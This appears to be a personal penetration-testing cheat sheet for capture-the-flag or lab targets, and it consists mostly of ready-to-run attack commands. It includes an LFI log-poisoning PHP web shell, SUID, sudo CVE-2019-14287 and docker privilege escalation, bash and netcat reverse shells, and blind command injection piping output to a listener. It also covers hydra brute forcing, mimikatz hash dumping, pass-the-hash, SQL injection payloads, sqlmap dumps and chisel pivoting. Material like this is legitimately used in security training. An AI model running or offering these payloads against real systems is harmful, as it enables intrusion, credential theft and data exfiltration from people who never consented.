# Useful websites
- https://gtfobins.github.io/
- https://book.hacktricks.xyz/
- https://www.revshells.com/
- https://www.aperisolve.fr/
- https://crackstation.net/
- https://www.tunnelsup.com/hash-analyzer/
- https://gchq.github.io/CyberChef/
- https://widesecurity.net/linux/linux-enumeration-privilege-escalation/
- https://github.com/internetwache/GitTools
- https://github.com/DominicBreuker/pspy

# Nmap
```bash
nmap -sC -sV -oN nmap.log IP
```
```bash
nmap --script IP
```


# Gobuster
```bash
# Enum web sites folders
gobuster dir -u http://<ip target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Enum web sites file (with extensions)
gobuster dir -u http://<ip target> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,bak,txt
```

# LFI
## Using wfuzz to test localfile inclusion
https://book.hacktricks.xyz/pentesting-web/file-inclusion


## php filter
```
php://filter/convert.base64-encode/resource=
```
## RCE using LFI
Use Burpsuite, intercept the request
Insert malicious code in the user agent field :

Change this 
```
GET /lfi/lfi.php?page=/var/log/apache2/access.log HTTP/1.1
Host: 10.10.85.157
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
To
```
GET /lfi/lfi.php?page=/var/log/apache2/access.log HTTP/1.1
Host: 10.10.85.157
User-Agent: Mozilla/5.0 <?php system($_GET['lfi']); ?> Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
The link becomes: 
```
http://<IP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls
```

# Linux PrivEsc
## SUID
```bash
find / -user root -perm -4000 -print 2>/dev/null
```

## If a command not using the full path (ex with cp command)
```bash
echo "!#/bin/bash" >> cp
echo "/bin/bash" >> cp
chmod +x cp

export PATH=/place/of/your/cp:$PATH
```

## Sudo vuln - CVE 2019-14287
```bash
sudo -l 
==> (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash
```
## wget priv esc
https://vk9-sec.com/wget-privilege-escalation/

## List all capabilities
```bash
getcap -r / 2>/dev/null

# if we get cap_setuid+ep on python3
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash");'
```

## Docker API PrivEsc

```bash
docker -H <ip>:2375 version

# if it return output with the version go to run an privileged container
docker -H tcp://<ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
```

# Enumerate Port 139/445 with enum4linux

```bash
enum4linux $IP
```

# Reverse Shells
## Bash
```bash
/bin/bash -c '/bin/bash >& /dev/tcp/IP/PORT 0>&1'
```

## nc mkfifo
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f
```

## Spawn TTY
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

# Hydra
## SSH
```bash
hydra -l <username> -P <full path to pass> <IP> -t 4 ssh
```
## FTP
```bash
hydra -l user -P passlist.txt ftp://IP
```
## Post Web Form
```bash
hydra -l <username> -P <wordlist> <IP> http-post-form "/<path after ip>:<tag username>=^USER^&<tag password>=^PASS^:<message when login incorrect>" -V
```
Example
```bash
1. Try to login and intercept with burp
2. Analyze the tags for username and password (for this example => username=admin&password=s3cret)
3. Launch hydra command

hydra -l admin -P pass.wordlist 10.10.0.23 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V
```

# Hashcat 
## Example hashes
- https://hashcat.net/wiki/doku.php?id=example_hashes

## Usage
```bash
hashcat -m <mode number> -a 0 <hash> <wordlist>
```

# Kerbrute
```bash
# Enumerate valid users
./kerbrute userenum --dc <domain controller> -d <domain> <userList> 

# To get more valid users
python3 /opt/impacket/examples/lookupsid.py anonymous@$IP
```
# ASREPRoasting

```bash
python3 GetNPUsers.py <domain>.local/<user>
```

# Enumeration SMB Share with authenticated user

```bash
smbclient -L \\\\IP -U 'username'    
```
Try to connect to particular service or drive

```bash
smbclient \\\\IP\SHARENAME\\ -U 'USER'
```

# Evil-WinRM
So we can run an PASS THE HASH Attack with Evil-WinRM

```bash
sudo evil-winrm -i <IP TARGET> -u <USER> -H <Hash of USER>
```

# Stegano
```bash
stegextract image.png -o out
```

if file out is a zip file do this
```bash
zip2john out > hash.txt
john hash.txt
```

extract info from an image
```bash
steghide extract -sf image.jpg
```

## full path example
```bash
steghide extract -sf hacker-with-laptop_23-2147985341.jpg -xf hidden_data.txt

file hidden_data.txt 
-> (pour connaitre le type de fichier, car le cat donnée un retour chiffré)
-> zip

unzip hidden_data.txt
-> password requis

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt hidden_data.txt
-> mdp trouvé

unzip hidden_data.txt
```
```bash
zsteg -a <file>
```

# Mimikatz
## Usage 
``` bash
mimikatz.exe

privilege::debug --> ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator

lsadump::lsa /patch --> Dump those hashes!

hashcat -m 1000 <hash> rockyou.txt
```

# SQLi
```
# The parameter accepts an integer
1 or 1=1-- -

# The parameter expects a string
1' or '1'='1'-- -

# Bypassed by going directly to the URL
http://<ip or domain name>/login?profileID=-1' or 1=1-- -&password=a
```

# Sqlmap

## SQLi in login form
```bash
# Show DB
sqlmap -u <url> --forms --batch --dbs

# Show of DB
sqlmap -u <url> --forms --batch --tables -D <database>

# Dump Table
sqlmap -u <url> -forms --batch --tables -D <database> -T <table> --dump
```

## Blind Injection 
```bash
sqlmap -u <url> --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
```

## OS Commands Injection

## Ways to Detect Blind Command Injection
```bash
;ping -c 10 IP #page reloading during 10s
```

## Redirection
```bash
; ls -la | nc {VPN_IP} {PORT} #This will send the output of ls -la to your netcat listener.
```

# Dump SQLite Database

```bash
sqlite3 <file>
sqlite> .dump
```

# Port Fordwarding

## SSH

Setup Dynamic Port Forwarding using SSH

```bash
ssh -i <sshkey> -D <port> <user>@<ip>

# Setup proxychain
sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 <port>

# Run port scan
proxychains nmap 127.0.0.1
```

Setup Local Port Forwarding

```bash
ssh -i <sshkey> -L <port>:127.0.0.1:<port> <user>@<ip>
#eg :
ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.169.111
```

## Chisel
Download binarie from github http://github.com/jpillora/chisel
Need to use the same version for client and server

1. Download chisel_X.X.X_linux_amd64
2. put the binarie on the target 

```bash
#On attacker machine
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse

#On target machine
./chisel_1.7.6_linux_amd64 <IP_ATTACKER>:12312 R:<PORT TO ACCESS LOCALLY>:127.0.0.1:<PORT LOCAL TARGET>

#example:
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
```
3. On attacker machine access to localhost:4505

## Sshuttle

```bash
sshuttle -r <user>@<target_ip> --ssh-cmd "ssh -i key.rsa" <target_network>/24 -x <target_ip>
sshuttle -r root@10.200.188.200 --ssh-cmd "ssh -i key.rsa" 10.200.188.0/24 -x 10.200.188.200
```

# Port Knocking

Lets bruteforce port knocking using this github repo : https://github.com/eliemoutran/KnockIt

```bash
python3 knockit.py -b <ip> <numbers>
python3 knockit.py -b 10.10.131.214 1111 2222 3333 4444
```

# Reverse Engineering
## Radare2

Open binary in debugging mode in radar2
```
r2 -d <binary>
```
To analyse all symbols and entry point in the executable, typing
```
aa 
```
 
For general help, run
```
?
```

For more specific information (for exemple about analysis command), typing
```
a?
```

To find a list of the fonctions
```
afl
```

Examine the assembly code of a specific function (pdf for Print Disassembly Function)
```
pdf @<function name>
```

Setting breakpoints
```
db <hex address of the wanted instruction)
eg. db 0x55ae52836612
==> Then to start the programm typing : dc
==> type ds to move tothe next instruction (do again pdf command to display)
```
 
To view the value of the registers
```
dr
```

Provide an argument with the program
```
ood 'argument'
```

Check the start of the disassembledd function and check memory
```
px <function>
eg. px @rbp-0xc
```

To get gaph view
```
vv
```

## Guidra
Download Guidra here : **https://ghidra-sre.org/**
maybe need to install java 

```bash
sudo apt install openjdk-13-jre openjdk-13-jdk
```

unzip the folder and launch GuidraRun
```bash
unzip <Guidra folder>
cd <Guidra folder>
./GuidraRun
```

```
1. Go to File->New Project->Non-Shared-Project.
2. Make a project directory, and a name, and click finish.
3. Go to File->Import File
4. Click Analyze->Yes
```
Guidra CheatSheet : **https://ghidra-sre.org/CheatSheet.html**

# Blind Command injection
To test if target is vulnerable to blind command injection 

```
Ways to Detect Blind Command Injection
;ping -c 10 IP #page reloading during 10s


Redirection of Output
; ls -la | nc {VPN_IP} {PORT} . This will send the output of ls -la to your netcat listener.
```


# Wpscan

```bash
# basic enumeration
wpscan --url http://<url>

# users enumeration
wpscan --url http://<url> --enumerate u
```

# Decrypt PGP File

First we need to import the key

```bash
gpg --import key.asc
```

If password is needed, we can use *gpg2john* to trying to crack the password

```bash
gpg2john key.asc > key.hash
john --wordlist=/usr/share/wordlists/rockyou.txt key.hash
```

Then to decrypt :

```bash
gpg --import key.asc
gpg --decrypt file.pgp
```

# Get data from .git directory

use this repo : https://github.com/internetwache/GitTools

```bash
./gitdumper.sh http://10.10.58.41/.git/ git_files
```

Once the dumper script get all the data let’s use the extractor script to have all the source code :

```bash
./extractor.sh git_files git_files_extract
```





